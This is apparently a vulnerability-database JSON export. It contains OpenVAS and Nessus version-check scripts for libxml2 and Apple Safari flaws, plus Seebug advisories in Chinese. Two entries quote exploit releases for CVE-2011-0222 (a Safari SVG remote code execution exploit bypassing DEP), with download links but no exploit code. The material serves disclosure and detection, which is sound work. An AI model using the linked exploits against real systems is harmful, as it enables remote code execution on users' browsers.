script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libxml2\", ver:\"2.6.32.dfsg-5+lenny5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-dbg\", ver:\"2.6.32.dfsg-5+lenny5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-dev\", ver:\"2.6.32.dfsg-5+lenny5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-doc\", ver:\"2.6.32.dfsg-5+lenny5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-utils\", ver:\"2.6.32.dfsg-5+lenny5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-libxml2\", ver:\"2.6.32.dfsg-5+lenny5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2\", ver:\"2.7.8.dfsg-2+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-dbg\", ver:\"2.7.8.dfsg-2+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-dev\", ver:\"2.7.8.dfsg-2+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-doc\", ver:\"2.7.8.dfsg-2+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-utils\", ver:\"2.7.8.dfsg-2+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-libxml2\", ver:\"2.7.8.dfsg-2+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-libxml2-dbg\", ver:\"2.7.8.dfsg-2+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2\", ver:\"2.7.8.dfsg-7\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-dbg\", ver:\"2.7.8.dfsg-7\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-dev\", ver:\"2.7.8.dfsg-7\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-doc\", ver:\"2.7.8.dfsg-7\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-utils\", ver:\"2.7.8.dfsg-7\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-libxml2\", ver:\"2.7.8.dfsg-7\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-libxml2-dbg\", ver:\"2.7.8.dfsg-7\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-03-13T14:26:54", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-12T00:00:00", "published": "2012-01-13T00:00:00", "id": "OPENVAS:1361412562310870530", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870530", "title": "RedHat Update for libxml2 RHSA-2012:0016-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for libxml2 RHSA-2012:0016-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-January/msg00004.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870530\");\n script_version(\"$Revision: 14114 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-12 12:48:52 +0100 (Tue, 12 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-13 10:45:41 +0530 (Fri, 13 Jan 2012)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"RHSA\", value:\"2012:0016-01\");\n script_cve_id(\"CVE-2011-0216\", \"CVE-2011-2834\", \"CVE-2011-3905\", \"CVE-2011-3919\");\n script_name(\"RedHat Update for libxml2 RHSA-2012:0016-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libxml2'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_4\");\n script_tag(name:\"affected\", value:\"libxml2 on Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"The libxml2 library is a development toolbox providing the implementation\n of various XML standards. One of those standards is the XML Path Language\n (XPath), which is a language for addressing parts of an XML document.\n\n A heap-based buffer overflow flaw was found in the way libxml2 decoded\n entity references with long names. A remote attacker could provide a\n specially-crafted XML file that, when opened in an application linked\n against libxml2, would cause the application to crash or, potentially,\n execute arbitrary code with the privileges of the user running the\n application. (CVE-2011-3919)\n\n An off-by-one error, leading to a heap-based buffer overflow, was found in\n the way libxml2 parsed certain XML files. A remote attacker could provide a\n specially-crafted XML file that, when opened in an application linked\n against libxml2, would cause the application to crash or, potentially,\n execute arbitrary code with the privileges of the user running the\n application. (CVE-2011-0216)\n\n A flaw was found in the way libxml2 parsed certain XPath expressions. If an\n attacker were able to supply a specially-crafted XML file to an application\n using libxml2, as well as an XPath expression for that application to run\n against the crafted file, it could cause the application to crash.\n (CVE-2011-2834)\n\n Note: Red Hat does not ship any applications that use libxml2 in a way that\n would allow the CVE-2011-2834 flaw to be exploited. However, third-party\n applications may allow XPath expressions to be passed which could trigger\n this flaw.\n\n An out-of-bounds memory read flaw was found in libxml2. A remote attacker\n could provide a specially-crafted XML file that, when opened in an\n application linked against libxml2, would cause the application to crash.\n (CVE-2011-3905)\n\n All users of libxml2 are advised to upgrade to these updated packages,\n which contain backported patches to correct these issues. The desktop must\n be restarted (log out, then log back in) for this update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.6.16~12.9\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-debuginfo\", rpm:\"libxml2-debuginfo~2.6.16~12.9\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.6.16~12.9\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-python\", rpm:\"libxml2-python~2.6.16~12.9\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T18:07:10", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 48808\r\nCVE ID: CVE-2011-0218,CVE-2011-0221,CVE-2011-0222,CVE-2011-0225,CVE-2011-0232,CVE-2011-0233,CVE-2011-0234,CVE-2011-0235,CVE-2011-0237,CVE-2011-0238,CVE-2011-0240,CVE-2011-0253,CVE-2011-0254,CVE-2011-0255,CVE-2011-1288,CVE-2011-1453,CVE-2011-1457,CVE-2011-1462,CVE-2011-1797\r\n\r\nSafari\u662f\u82f9\u679c\u8ba1\u7b97\u673a\u7684\u6700\u65b0\u4f5c\u4e1a\u7cfb\u7edfMac OS X\u4e2d\u7684\u6d4f\u89c8\u5668\uff0c\u4f7f\u7528\u4e86KDE\u7684KHTML\u4f5c\u4e3a\u6d4f\u89c8\u5668\u7684\u8fd0\u7b97\u6838\u5fc3\u3002\r\n\r\n5.1\u548c5.0.6\u4e4b\u524d\u7248\u672c\u7684Safari\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u591a\u4e2a\u5b89\u5168\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u8fd9\u4e9b\u6f0f\u6d1e\u901a\u8fc7\u8bf1\u4f7f\u7528\u6237\u6d4f\u89c8\u6076\u610f\u7f51\u9875\uff0c\u9020\u6210\u4fe1\u606f\u6cc4\u9732\uff0c\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\uff0c\u62d2\u7edd\u670d\u52a1\u6216\u5176\u4ed6\u3002\n\nApple Safari 5.x\r\nApple Safari 4.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nApple\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://support.apple.com/", "modified": "2011-07-22T00:00:00", "published": "2011-07-22T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20751", "id": "SSV:20751", "type": "seebug", "title": "Apple Safari 5.1\u548c5.0.6\u4e4b\u524d\u7248\u672c\u591a\u4e2a\u5b89\u5168\u6f0f\u6d1e", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T17:58:52", "bulletinFamily": "exploit", "description": "CVE ID: CVE-2010-1823,CVE-2011-0164,CVE-2011-0200,CVE-2011-0204,CVE-2011-0215,CVE-2011-0218,CVE-2011-0221,CVE-2011-0222,CVE-2011-0223,CVE-2011-0225,CVE-2011-0232,CVE-2011-0233,CVE-2011-0234,CVE-2011-0235,CVE-2011-0237,CVE-2011-0238,CVE-2011-0240,CVE-2011-0253,CVE-2011-0254,CVE-2011-0255,CVE-2011-0259,CVE-2011-0981,CVE-2011-0983,CVE-2011-1109,CVE-2011-1114,CVE-2011-1115,CVE-2011-1117,CVE-2011-1121,CVE-2011-1188,CVE-2011-1203,CVE-2011-1204,CVE-2011-1288,CVE-2011-1293,CVE-2011-1296,CVE-2011-1440,CVE-2011-1449,CVE-2011-1451,CVE-2011-1453,CVE-2011-1457,CVE-2011-1462,CVE-2011-1774,CVE-2011-1797,CVE-2011-2338,CVE-2011-2339,CVE-2011-2341,CVE-2011-2351,CVE-2011-2352,CVE-2011-2354,CVE-2011-2356,CVE-2011-2359,CVE-2011-2788,CVE-2011-2790,CVE-2011-2792,CVE-2011-2797,CVE-2011-2799,CVE-2011-2809,CVE-2011-2811,CVE-2011-2813,CVE-2011-2814,CVE-2011-2815,CVE-2011-2816,CVE-2011-2817,CVE-2011-2818,CVE-2011-2820,CVE-2011-2823,CVE-2011-2827,CVE-2011-2831,CVE-2011-3219,CVE-2011-3232,CVE-2011-3233,CVE-2011-3234,CVE-2011-3235,CVE-2011-3236,CVE-2011-3237,CVE-2011-3238,CVE-2011-3239,CVE-2011-3241,CVE-2011-3244,CVE-2011-3252\r\n\r\niTunes\u662f\u4e00\u6b3e\u5a92\u4f53\u64ad\u653e\u5668\u7684\u5e94\u7528\u7a0b\u5e8f\uff0c2001\u5e741\u670810\u65e5\u7531\u82f9\u679c\u7535\u8111\u5728\u65e7\u91d1\u5c71\u7684Macworld Expo\u63a8\u51fa\uff0c\u7528\u6765\u64ad\u653e\u4ee5\u53ca\u7ba1\u7406\u6570\u5b57\u97f3\u4e50\u548c\u4e0e\u89c6\u9891\u6587\u4ef6\uff0c\u662f\u7ba1\u7406\u82f9\u679ciPod\u7684\u6587\u4ef6\u7684\u4e3b\u8981\u5de5\u5177\u3002\r\n\r\nApple iTunes\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u591a\u4e2a\u6f0f\u6d1e\uff0c\u53ef\u88ab\u6076\u610f\u7528\u6237\u5229\u7528\u6cc4\u9732\u654f\u611f\u4fe1\u606f\uff0c\u64cd\u4f5c\u67d0\u4e9b\u6570\u636e\u3001\u6267\u884c\u8de8\u7ad9\u811a\u672c\u548c\u6b3a\u9a97\u653b\u51fb\u3001\u7ed5\u8fc7\u67d0\u4e9b\u5b89\u5168\u9650\u5236\u3001\u63a7\u5236\u7528\u6237\u7cfb\u7edf\u3002\r\n\r\n1\uff09\u5728\u5904\u7406\u5b57\u7b26\u4e32\u6807\u5fd7\u5316\u65f6\uff0cCoreFoundation\u7ec4\u4ef6\u4e2d\u5b58\u5728\u9519\u8bef\uff0c\u901a\u8fc7\u4e2d\u95f4\u4eba\u653b\u51fb\u7834\u574f\u5185\u5b58\u3002\r\n\r\n2\uff09\u5904\u7406AAC\u6d41\u65f6CoreAudio\u7ec4\u4ef6\u4e2d\u5b58\u5728\u9519\u8bef\uff0c\u53ef\u9020\u6210\u7f13\u51b2\u533a\u6ea2\u51fa\u3002\r\n\r\n3\uff09\u5904\u7406H.264\u7f16\u7801\u6587\u4ef6\u65f6CoreMedia\u7ec4\u4ef6\u4e2d\u5b58\u5728\u9519\u8bef\uff0c\u53ef\u9020\u6210\u7f13\u51b2\u533a\u6ea2\u51fa\u3002\r\n\r\n4\uff09\u4f7f\u7528AddressSanitizer\u65f6WebKit\u7ec4\u4ef6\u4e2d\u5b58\u5728\u9519\u8bef\uff0c\u53ef\u9020\u6210\u5185\u5b58\u7834\u574f\uff1b\r\n\r\n5\uff09WebKit\u7ec4\u4ef6\u7684\u591a\u4e2a\u9519\u8bef\u53ef\u88ab\u5229\u7528\u7834\u574f\u5185\u5b58\u3002\n\nApple iTunes 10.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nApple\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://support.apple.com/", "modified": "2011-10-13T00:00:00", "published": "2011-10-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-21013", "id": "SSV:21013", "title": "Apple iTunes\u591a\u4e2a\u5b89\u5168\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T18:01:46", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2011-07-27T00:00:00", "published": "2011-07-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20769", "id": "SSV:20769", "title": "Safari 5.0.5 SVG Remote Code Execution Exploit (DEP bypass)", "type": "seebug", "sourceData": "\n Abysssec Public Advisory\r\n \r\n apple killed one of our 0day no point to keep it private anymore :(\r\n there is another version of exploit using POPup and thats more\r\nreliable but as you know safari block pop up by default so we found a\r\ncool way to bypass it and stand alone module .\r\n this exploiting using ROP to bypass permanent DEP.\r\n \r\n note : Change spray range if not work on your machine.\r\n \r\n CVE-2011-0222 :\r\n \r\n WebKit, as used in Apple Safari before 5.0.6, allows remote attackers\r\nto execute arbitrary code or cause a denial of service (memory\r\ncorruption and application crash)\r\n via a crafted web site a different vulnerability than other WebKit\r\nCVEs listed in APPLE-SA-2011-07-20-1.\r\n \r\n Tested on windows XP SP3 and safari 5.0.5\r\n \r\n feel free to contact us at : info [at] abysssec.com\r\n \r\n and follow @abysssec for updates\r\n \r\n http://www.abysssec.com/files/CVE-2011-0222_WinXP_Exploit.zip\r\n http://www.exploit-db.com/sploits/CVE-2011-0222_WinXP_Exploit.zip\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-20769"}, {"lastseen": "2017-11-19T17:56:47", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 48832\r\nCVE ID: CVE-2011-0216\r\n\r\nSafari\u662f\u82f9\u679c\u8ba1\u7b97\u673a\u7684\u6700\u65b0\u4f5c\u4e1a\u7cfb\u7edfMac OS X\u4e2d\u7684\u6d4f\u89c8\u5668\uff0c\u4f7f\u7528\u4e86KDE\u7684KHTML\u4f5c\u4e3a\u6d4f\u89c8\u5668\u7684\u8fd0\u7b97\u6838\u5fc3\u3002\r\n\r\nSafari 5.0.6\u4e4b\u524d\u7248\u672c\u5728libxml\u7684\u5b9e\u73b0\u4e0a\u5b58\u5728\u5355\u5b57\u8282\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u5728\u53d7\u5f71\u54cd\u5e94\u7528\u7a0b\u5e8f\u4e0b\u6267\u884c\u4efb\u610f\u4ee3\u7801\u6216\u9020\u6210\u62d2\u7edd\u670d\u52a1\u3002\n\nApple Safari 5.x\r\nApple Safari 4.x\r\nApple TV 4.3\r\nApple TV 4.2\r\nApple TV 4.1\r\nApple TV 4.0\r\nApple TV 2.1\r\nApple TV 1.0\r\nApple iOS 4.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nApple\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://support.apple.com/", "modified": "2011-12-08T00:00:00", "published": "2011-12-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-26024", "id": "SSV:26024", "type": "seebug", "title": "Apple Safari "libxml"\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:01:52", "bulletinFamily": "exploit", "description": "Bugtraq ID: 48832\r\nCVE ID\uff1aCVE-2011-0216\r\n\r\nApple Safari\u662f\u4e00\u6b3e\u6d41\u884c\u7684WEB\u6d4f\u89c8\u5668\u3002\r\nApple Safari\u4f7f\u7528\u7684libxml\u5904\u7406XML\u6570\u636e\u65f6\u5b58\u5728\u4e00\u4e2a\u5355\u5b57\u8282\u5806\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u67e5\u770b\u7279\u5236\u7684WEB\u7ad9\u70b9\u53ef\u5bfc\u81f4\u5e94\u7528\u7a0b\u5e8f\u5d29\u6e83\u6216\u53ef\u80fd\u4ee5\u5e94\u7528\u7a0b\u5e8f\u4e0a\u4e0b\u6587\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n\nApple Safari 4.1.2 for Windows\r\n Apple Safari 4.0.5 for Windows\r\n Apple Safari 4.0.5\r\n Apple Safari 4.0.4 for Windows\r\n Apple Safari 4.0.4\r\n Apple Safari 4.0.3 for Windows\r\n Apple Safari 4.0.3\r\n Apple Safari 4.0.2 for Windows\r\n Apple Safari 4.0.2\r\n Apple Safari 4.0.1\r\n Apple Safari 5.0.5 for Windows\r\n Apple Safari 5.0.5\r\n Apple Safari 5.0.4 for Windows\r\n Apple Safari 5.0.4\r\n Apple Safari 5.0.3 for Windows\r\n Apple Safari 5.0.3\r\n Apple Safari 5.0.2 for Windows\r\n Apple Safari 5.0.2\r\n Apple Safari 5.0.1 for Windows\r\n Apple Safari 5.0.1\r\n Apple Safari 5.0 for Windows\r\n Apple Safari 5.0\r\n Apple Safari 4.1.3 for Windows\r\n Apple Safari 4.1.3\r\n Apple Safari 4.1.2\r\n Apple Safari 4.1.1\r\n Apple Safari 4.1\r\n Apple Safari 4.0 Beta\r\n Apple Safari 4.0\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\nApple Safari 5.0.6\u548c5.1\u5df2\u7ecf\u4fee\u590d\u6b64\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.apple.com/safari/download/", "modified": "2011-07-25T00:00:00", "published": "2011-07-25T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20762", "id": "SSV:20762", "title": "Apple Safari 'libxml'\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T18:01:40", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2011-07-26T00:00:00", "published": "2011-07-26T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20768", "id": "SSV:20768", "title": "Safari SVG DOM processing PoC", "type": "seebug", "sourceData": "\n /*\r\n# Exploit Title: CVE-2011-0222 Safari SVG DOM processing PoC\r\n# Date: 2011-07-25\r\n# Author: Nikita Tarakanov (CISS Research Team), Alex Bazhanyuk (CISS Research Team)\r\n# Software Link: http://www.apple.com/au/safari/download/\r\n# Version: prior to 5.0.6, 5.1\r\n# Tested on: Win XP SP3, Win 7 SP1\r\n# CVE : CVE-2011-0222\r\n# Status : Patched\r\n*/\r\n \r\nPoC: http://www.exploit-db.com/sploits/CVE-2011-0222.zip\r\nhttp://sebug.net/paper/Exploits-Archives/2011-exploits/CVE-2011-0222.zip\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-20768"}, {"lastseen": "2017-11-19T18:01:41", "bulletinFamily": "exploit", "description": "Bugtraq ID: 48839\r\nCVE ID\uff1aCVE-2011-0217\r\n\r\nApple Safari\u662f\u4e00\u6b3e\u6d41\u884c\u7684WEB\u6d4f\u89c8\u5668\u3002\r\nSafari\u6d4f\u89c8\u5668\u7684"AutoFill web forms"\u529f\u80fd\u53ef\u586b\u5145\u4e0d\u53ef\u89c1\u8868\u5355\u5b57\u6bb5\uff0c\u5728\u7528\u6237\u63d0\u4ea4\u8868\u5355\u4e4b\u524d\u7ad9\u4e0a\u7684\u811a\u672c\u53ef\u8bbf\u95ee\u8fd9\u4e9b\u4fe1\u606f\u3002\n\nApple Safari 5.0.5 for Windows\r\n Apple Safari 5.0.5\r\n Apple Safari 5.0.4 for Windows\r\n Apple Safari 5.0.4\r\n Apple Safari 5.0.3 for Windows\r\n Apple Safari 5.0.3\r\n Apple Safari 5.0.2 for Windows\r\n Apple Safari 5.0.2\r\n Apple Safari 5.0.1 for Windows\r\n Apple Safari 5.0.1\r\n Apple Safari 5.0 for Windows\r\n Apple Safari 5.0\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\nApple Safari 5.0.6\u548c5.1\u5df2\u7ecf\u4fee\u590d\u6b64\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.apple.com/safari/download/", "modified": "2011-07-25T00:00:00", "published": "2011-07-25T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20761", "id": "SSV:20761", "title": "Apple Safari 'AutoFill web forms'\u529f\u80fd\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}], "nessus": [{"lastseen": "2019-02-21T01:15:11", "bulletinFamily": "scanner", "description": "The version of Apple Safari installed on the remote Mac OS X host is earlier than 5.1 / 5.0.6. As such, it is potentially affected by numerous issues in the following components :\n\n - Safari\n - WebKit", "modified": "2018-07-14T00:00:00", "id": "MACOSX_SAFARI5_1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=55638", "published": "2011-07-21T00:00:00", "title": "Mac OS X : Apple Safari < 5.1 / 5.0.6", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(55638);\n script_version(\"1.45\");\n script_cvs_date(\"Date: 2018/07/14 1:59:35\");\n\n script_cve_id(\n \"CVE-2010-1823\",\n \"CVE-2010-3829\",\n \"CVE-2011-0164\",\n \"CVE-2011-0217\",\n \"CVE-2011-0218\",\n \"CVE-2011-0219\",\n \"CVE-2011-0221\",\n \"CVE-2011-0222\",\n \"CVE-2011-0223\",\n \"CVE-2011-0225\",\n \"CVE-2011-0232\",\n \"CVE-2011-0233\",\n \"CVE-2011-0234\",\n \"CVE-2011-0235\",\n \"CVE-2011-0237\",\n \"CVE-2011-0238\",\n \"CVE-2011-0240\",\n \"CVE-2011-0242\",\n \"CVE-2011-0244\",\n \"CVE-2011-0253\",\n \"CVE-2011-0254\",\n \"CVE-2011-0255\",\n \"CVE-2011-0981\",\n \"CVE-2011-0983\",\n \"CVE-2011-1107\",\n \"CVE-2011-1109\",\n \"CVE-2011-1114\",\n \"CVE-2011-1115\",\n \"CVE-2011-1117\",\n \"CVE-2011-1121\",\n \"CVE-2011-1188\",\n \"CVE-2011-1190\",\n \"CVE-2011-1203\",\n \"CVE-2011-1204\",\n \"CVE-2011-1288\",\n \"CVE-2011-1293\",\n \"CVE-2011-1295\",\n \"CVE-2011-1296\",\n \"CVE-2011-1449\",\n \"CVE-2011-1451\",\n \"CVE-2011-1453\",\n \"CVE-2011-1457\",\n \"CVE-2011-1462\",\n \"CVE-2011-1774\",\n \"CVE-2011-1797\",\n \"CVE-2011-3443\"\n );\n script_bugtraq_id(\n 43228,\n 46262,\n 46614,\n 46703,\n 46785,\n 47029,\n 47604,\n 48820,\n 48823,\n 48824,\n 48827,\n 48839,\n 48840,\n 48841,\n 48842,\n 48843,\n 48844,\n 48845,\n 48846,\n 48847,\n 48848,\n 48849,\n 48850,\n 48851,\n 48852,\n 48853,\n 48854,\n 48855,\n 48856,\n 48857,\n 48858,\n 48859,\n 48860\n );\n script_xref(name:\"EDB-ID\", value:\"17575\");\n script_xref(name:\"EDB-ID\", value:\"17993\");\n\n script_name(english:\"Mac OS X : Apple Safari < 5.1 / 5.0.6\");\n script_summary(english:\"Check the Safari SourceVersion\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote host contains a web browser that is affected by several\nvulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Apple Safari installed on the remote Mac OS X host is\nearlier than 5.1 / 5.0.6. As such, it is potentially affected by\nnumerous issues in the following components :\n\n - Safari\n - WebKit\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/HT4808\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.apple.com/archives/security-announce/2011/Jul/msg00002.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Apple Safari 5.1 / 5.0.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n 